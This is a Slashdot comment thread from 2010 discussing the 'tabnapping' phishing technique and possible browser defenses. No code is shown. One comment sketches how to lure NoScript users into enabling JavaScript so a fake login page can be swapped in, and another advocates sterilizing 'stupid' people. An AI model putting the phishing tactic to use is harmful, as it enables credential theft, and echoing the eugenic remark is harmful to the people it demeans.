Slashdot Mirror
Tabnapping Scams Around the Corner?
scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)
...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?
Living With a Nerd
This is why it's so important to check the address of the site you're about to log into.
People who do this crap of stealing people's accounts or identities should be shot.
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.
And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common(if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.
You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.
You see this, and think "Why didn't someone think about this before?"
Emotions! In your brain!
Without having RTFA:
That sounds a lot more complicated as you'd need to hack at least one high traffic website, read the cookies stored by the browser, and then force a meta-refresh only when the user isn't looking.
"There is a way that seems right to a man, but its end is the way of death." Proverbs 16:25 (NKJV)
He could have come up with something a little less douchey than "tabnapping". Next thing you know, everyone will be saying, "I've been tabnapped!"
Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.
But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.
You can't handle the truth.
Not exactly. From his page on this "exploit"...
So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
Dear Slashdot: I submitted the above story this morning and was pleased when it was accepted for publication on your website. However, I was a little peeved to find that the link I included in the story - was substituted in the final story with this one Obviously this substitution removes any benefit whatsoever of my having taken the time to write the blog post and submit it to slashdot in the first place. Any chance of swapping the link back?
I'm supposed to open a tab, go to a website, open a second tab, go to a compromised website which changes the content of the first tab without my interaction, and then log on to the site presented in the first tab? Don't you think that I'll notice that I'm not on the same website I was on previously?
Seriously, all of these types of attacks rely on the user having the mental capacity of a damp shoelace. Maybe letting them get bitten every so often will teach them to pay more attention to what's going on, and not blindly click away every message box or enter details into every site they're presented with.
Finally had enough. Come see us over at https://soylentnews.org/
Just give me something without sugar!
who develop these attack vectors used half of their creativity on a legitimate purpose, they'd make 10x the money and earn it completely honestly
i mean this is a brilliant attack. so, whoever thought this up, why aren't you making millions in a respectable way? you obviously have the brains to do that
some people just have to be assholes
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
Simple solution - don't use tabs in browsers. The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.
My two cents as far as tabs go, is that a window should be a window - not a collection of tabs - for the simple reason that tabs obfuscate (hide) the content within. Yes, I can see the advantages of tabs within some UIs in certain situations - for example: segmenting "general" from "advanced" preferences; stepping data through a process, or in a rich client application where data is related.
Where tabs are a bad fit for browsing is that the data viewed in web apps is often too disparate - there is no linkage between any of the tabs within a "window" - the content of what is presented within is asynchronous and disconnected - tabs in browsers never have a true relationship with each other. Sure - you might be looking at two related sites, or two pages within a site, but tabs offer nothing (UI-wise) that a window cannot do. A new window offers a single view of a chunk of information; if you need another view, why not simply use another window. A mish mash of windows filled with tabs does not improve the UI in any way.
This attack only works if you allow Javascript by default, instead of only whitelisting sites that you trust.
Can Javascript really access other tabs or windows? Shouldn't it be restricted to its own page/tab/window?
like you said, you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?
A lot of web sites periodically invalidate session cookies after 24 hours. In that case, the next link you click even on the legitimate site will present a login screen.
No, because this is REALLY dangerous for Yahoo Mail.
I'm logged in, and it likes to revert back to login pages all the time! It even makes you login twice "to check your security". So this TabMcNab exploit is going to be really dangerous somewhere. I'm pretty sharp, but that page has cried wolf so many times I would have fallen for this if it was grade-A delivered.
i am so goddamned tired of hearing these stories that say "oh noes, stupidity might be painful, what will we do, it's so terrible, simpwy tewwible!" if you are stupid you should not breed. if you are stupid, nature has only ever had one cure for that, a little good old Darwinism natural selection. why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?
It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.
You can't handle the truth.
AND if you're not using noscript (or equivalent) or you allow that site to run whatever javascript it wants. And so forth.
So this is a pretty clever thing to do. The issues here are that it's sneaky, remarkably effective (even against those who are security-aware), and difficult to stop, since tabbed browsing is generally regarded as a good thing.
One possible solution would be to have browser support for user-opted website whitelisting. When you visit a site where you require security (banking, etc.) for the first time, you can configure your browser to add the domain to a security-aware whitelist. Every time, from then on, when you visit that page, your browser visually (and obviously) marks that page (gold border, animated lock, etc.) if its SSL credentials check out. As a user, I would simply have to know "always check for those visual effects before you enter your banking information", which is not a hard thing to remember.
Another would be to have a browser-supplied interface for entering credentials that can be invoked by the site. You click the log-in button, your browser supplies a "Guaranteed Secure" login modal dialog, you enter your information, and your browser then forwards it to the page and logs you in. You can then add important domains to the list, and your browser will never pop-up that dialog for a page that isn't on that list. Same as above, you would elect to whitelist sites that are important in advance, and because it's a browser-supplied login, no fake tab (or fake SSL certificate) will be able to induce that dialog.
At some point, people will figure out clever ways around things. The browser needs to be able to accommodate the idea that every page on the Internet is not equal from the point of view of the user. There must be a mechanism by which the browser can allow a user to easily (visually) differentiate between a legit page and one that has made itself look legit.
As far as I can tell, the script merely waits a while (hoping that the user's attention is diverted) before changing the contents. Surely, the same idea works about as well if the user uses multiple windows rather than multiple tabs. Just as soon as attention is diverted from the appropriate browser and it is covered by other windows, the content could be changed without the user noticing.
The only difference is that, with multiple windows, a portion of the window may still be visible when the user is looking at another window. In my limited experience, folks tend to maximize windows anyway (I *hate* that!), so that's not a significant issue.
Am I missing something?
Phiwum's law: anyone that names an obvious law after himself and then puts it in his own sig is just pathetic.
You are not to blame, because even the browser creators misunderstand ssl.
-Ssl does not mean that it is save to input credentials.
-More gui does not not help much.
-If a site makes an error with ssl (expired, or changed subdomain) you only have a all or nothing option.
As your parent article states, there already is an option to only enable javascript on trusted sites, (noscript), but this relies on whitelisting particular sites. Only securityparapoid people (like me) use it.
I tried it out and Protected/Froze/Locked the tab and the exploit ran.
I think it's because the full contents were loaded and it didn't actually try to navigate anywhere.
My first Journal Entry ever, in 8 years! http://slashdot.org/journal/365947/aphelion-scifi-fantasy-horror-poetry-webzine
It's conceivable, especially under this circumstance, that an already open (let's say) Gmail page is re-written. What's the first thought that might come to mind? Oh, it auto logged off - only to have people "log back in". Agreed. This issue has potential. Bring out the fixes - soon!
L'esperienza de questa dolce vita (The experience of this sweet life) - Dante Alighieri, The Divine Comedy
"Slashdot is about news, not driving traffic to someone's website. And 'getting traffic' is not some kind of exchange or reward offered for submitting an article. If a different link is editorially better, then it is expected that the editors will swap it." - by mysidia (191772) on Tuesday May 25, @09:42AM (#32335284)
Ahem: BULLSHIT! Slashdot's altering scamdetect's post is doing EXACTLY WHAT YOU ACCUSE SCAMDETECT OF (basically): Slashdot's editors altering scamdetect's source data is directing traffic to a "crony" of these so-called story editors' favorite/pal/affiliate (their crony in other words) site imo @ least... taking/playing "favorites" in essence.
Krebs on security appears to be a "crony" (or what's the word SEO optimization scammers use? Oh, yes: "Affiliates") of the editors here!
AGAIN: The editors here are in fact violating what you said yourself about "driving traffic to someone else's site" (which is EXACTLY what they're doing by taking out the url link that spamdetect put up, and putting in one of the slashdot editors' own choice instead).
After all - Neither Kreb's article (dated Monday, May 24th, 2010 at 9:07 pm) nor the one scamdetect put up (dated today, Tues. May 25th, 2010) are the original discoverers of this material, so neither one's date data really matter either, as to "whom posted what first"!
Nor is either one better than the other, imo @ least, editorially!
(Now, as far as MY credentials in this field? Ok - I am a multiply degreed college grad here no less in both CSC & MIS, complete with all the English you'd ever need in both of those degrees I have on the subject of computer sciences (along with 16 yrs. of professional experience on my part & being multiply internationally published for my works in this science, plus being featured as tech shows like MS TechEd 2 yrs in a row as a finalist for commercial code work & ideas in the hardest category there in SQLServer Performance Enhancement while on paid contract to do so increasing the programs used effectiveness by 40% or more (block level device driver work & data structuring in said commercial wares of "Enterprise Class" scale classification) for them no less also)).
I wonder who is more qualified on the subject of computing here... myself, or the "editors of slashdot"? I say that, because I disgree with your statements/thoughts, strongly, and I wager that the story editors here aren't even as qualified on this science & subject as I am (nor moreso on their parts in English either).
Secondly: What exactly qualifies Slashdot's editors as to "what's better editorially"?
Again - Do they have degrees in English to substantiate that they themselves are "expert" on what's better, editorially??
I'd wager not.
Man - You're the pot calling the kettle black man!
(Plus, this isn't the first time I have seen this type of shenanigan out of slashdot (or other news websites) either!)
This happens ALL THE TIME (in catering to "partners/affliates/favorites" (spelled sideways = CRONIES!)), & I also feel it's wrong as well.
APK
P.S.=> Bottom-line? Well, I also think scamdetect has every right to be upset that his submission was altered by the story editors here, as to the link submitted data as the source, because I'd actually wager that Brian Krebs may no more qualified as an expert in this area than are the folks that scamdetect originally initially used as his source data in fact - unless someone can show me that Brian Krebs has his CISSP certification, or an actual A.A.S. or B.S. (or better in post grad masters or doctoral work) in CSC related disciplines (or, those CSC degrees specifically those related to computer security actually)... apk
Why not use different profiles with the -no-remote option? Even if you have multiple tabs open and multiple browser windows, have a profile for financial operations only, or whatever you want to protect and have a persona that is easily recognized for that purpose. Then browser history with personal finance history will not be exposed to your other browsing.
Except that so many websites are JavaScript dependent that temporarily allowing JS from a page is fairly common for all but the most paranoid. Design your malicious site to be unusable without JavaScript, 90% of NoScript users will at least temporarily whitelist it if the content is of sufficient interest; I recommend porn. When they quickly switch tabs so their bosses don't see the porno site, switch to a fake log-in screen.
Yeah, most people will catch it, but you aren't coding for most people. You're coding for dumbasses (or people ignorant of this exploit with little native skepticism), and even among NoScript users, I guarantee a few percent of them forget what they were doing, overlook the address bar, and rationalize the log-in screen by assuming they must have opened it and forgot about it, then remember something they needed to do and enter their log-in details.
$_ = "wftedskaebjgdpjgidbsmnjgcdwatb"; tr/a-z/oh, turtleneck Phrase Jar!/; print
So a page renders itself then waits until it's inactive then rerenders it won't take long for a patch.
Knowledge = Power
P= W/t
t=Money
Money = Work/Knowledge so the less you know the more you make
Ive never understood tabs myself. I already had tabs built into my operating system, they called it the taskbar. What's the vulnerability being attacked here anyway? I know of no way for content in one tab to insert content or even change the location of another tab ...
*DrugCheese rants*
I think I'd want to have some kind of referendum on what "stupid" is before I'd agree to the whole sterilization thing.
And as far as natural selection taking care of stupidity, it much more often seems like the stupider one is the more their reproductive practice takes on a pattern similar to that of voting in Chicago: early and often.
I don't see why it would be so hard for Firefox to simply report to the user a warning when they begin to send a particular password to a "new" site, one that they haven't sent a password to before, and even more-so if the password is generally sent to another site.
I think this solution fits the problem well, as you're trying to prevent yourself from sending passwords to places that shouldn't get them.
support appreciated - thank you!
.. leave your bank tab open and walk away.
Sure I'll leave facebook or gmail open, but there's limited damage that can happen from someone hacking them.
Also for some reason i usually have two windows open, one for "serious business" where gmail is the first tab, facebook is the second tab, then what ever else i happen to be looking at in the other tabs. Then in a whole other window there's the random youtube, flash games and stumble upon results. Always keeping facebook and gmail in the same tabs limits the chances of me being tricked by this by anything i regularly log into. WTF is gmail doing all the way over here!?
Eschew Obfuscation
As the richness of the web experience increases due to interactive technologies available on the client-side unscrupulous people work to catch people off-guard for their own advantage. At the most benign level this is done by advertisers seeking to gain attention. At the worst thieves use client-side scripting as a virtual pickpocket tool.
When possible I remind my family members to stay on alert when on-line (or even off-line). This includes not clicking on links in email, of course. It also includes not logging into a service unless they have entered the URL themselves or used a bookmark they have set up. Yes, this does not prevent MitM attacks and will not protect them from a scheme that changes a browser's bookmarks. But it solves the bulk of the phishing attacks to date.
One reason I prefer specialized apps for important services (banking, on-line status update services, email) over using a generic web interface is that specialized apps are less prone to be faked by XSS, phishing look-a-like pages, etc. This is especially true of closed platform apps like iPhone/iPad apps that undergo an approval process by a third party.
Sad as it is to admit one benefit to the lack of "freedom" on the iPhone/iPad platform is protection from scammers.
What is an open alternative to protecting the unaware from these scams? I'm all ears.
-- @rjamestaylor on Ello
otherwise, you're appearing to myself as another "let's butter up the owners/mods at slashdot" type
Ok, I'll clear up a few things:
Yes, there are people with alternate logons; but I've had exactly two; this one, and when when I lost my password for a time used this one. One would think that a person would friend alterate identities; you really think I have over 200 alternate identities?
The fact is, I'm simply a longtime slashdot reader who loves the site and tries to contribute the best I can.
As to "mods", I post too often to get mod points (although I get metamod points).
we're not foolish enough to register here to be easily tracked for trolling registered users
Too bad you're not registered, because you'll probably not see my reply. That's an advantage of being logged on -- you're informed of replies to your comments and can have an intelligent conversation with people way more knowledgable and intelligent than me; one of the great things about this site is you can actually LEARN stuff sometimes from some of the comments. Scientists from all sorts of disciplines, engineers, designers, from all over the world post here. You're not going to find discussions like you see here at DIGG, or anywhere else for that matter.
Free Martian Whores!
"My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."
Oh the bold lettering, the all-caps, the irony that is the quote... Your post wouldn't be nearly so hilarious without it. Thanks again for a good laugh.
By the way Andrew, let me know when you get a citation for an article in a peer-reviewed journal that is at least semi-recent. It'll make the copy-pasting of your minimal accomplishments that much more entertaining.
Those who can, do. Those who can't, sue.
Damn you Opera! If you hadn't invented tabbed browsing, none of this would have happened!!
Alexander Peter Kowalski (since you insist on people using your full name), thank you for that morning of entertainment. Your level of delusion and OCD-ness is both side-splittingly hilarious and saddening. It's like watching a train-wreck. I know I shouldn't laugh, but the self-inflicted nature of the wreck is what makes it so damn funny.
Those who can, do. Those who can't, sue.
The real smart users don't do "real things" via "go back" or "left open" windows. When I bank etc, I use a freshly opened window (if not always browser, but one can only by so paranoid) opened with file-new not ctrl-n etc. Then I do my business and get out.
Sure my slashdot.org and my social and dating site kinda crap stays logged in, but so what.
If it's real business I don't go there unless I typed the URL by hand. I don't even bookmark the sites for my bank and credit card etc because _I_ have been expecting the bookmark rewriting attack as more likely than tab reassignment. But who am I to judge...
Innocent people shouldn't be forced to pay for inferior software development.
--"Code Complete" Microsoft Press
At least his name carries a lot of weight: http://www.jeremyreimer.com/phpbb2/viewtopic.php?t=4128 and http://www.thorschrock.com/2008/05/19/how-to-respond-when-people-threaten-to-sue-you-on-the-web/
My bank has what I consider to be really good security.
My login page just asks for my account number.
Then, the bank proves who it is to me -- by showing me a picture of my choosing and a passphrase of my choosing -- before it asks me for my password.
In other words, before it asks me to give a secret away, it verifies itself with a secret.
As if that weren't good enough, on any browser that I haven't registered, it gives me a challenge question. So, to fake this, even if the scammer managed to get my account name and password, it doesn't have the browser credential, and can't get past the security question; it can't pretend to be my bank because it doesn't know my picture and passphrase (only delivered over SSL), etc.
To clarify: I give my account number. If it is playing MITM, it gets a challenge question, which it can't answer and I know is invalid if it passes it to me; if it wants to bypass that and just ask for my password, it doesn't know what image/phrase to show; it can't play transparent MITM and watch because of SSL security and lack of browser private key credential. That's the best security I've seen so far. Just fails to keylogging software, but that's what a PPC mac is for :-).
A mini-remark: typing stuff on an on-screen keyboard will not help you.
Of course, it depends on the type of keyboard you are using and on the platform, but for instance - Windows' osk.exe (the default one) works by sending WM_KEYUP and WM_KEYDOWN messages to an input window.
A keylogger that uses hooks to watch messages sent to that window will still see the keystrokes.
You can try this hint: http://www.lazybit.com/index.php/a/2007/03/01/free_keylogger_protection It will confuse the person who reads the log, but it makes the data entry procedure much longer and error-prone.
p.s. keystrokes typed inside a virtual machine can also be grabbed, as the host OS "sees" them first, and that's where the keylogger is.
The saddest poem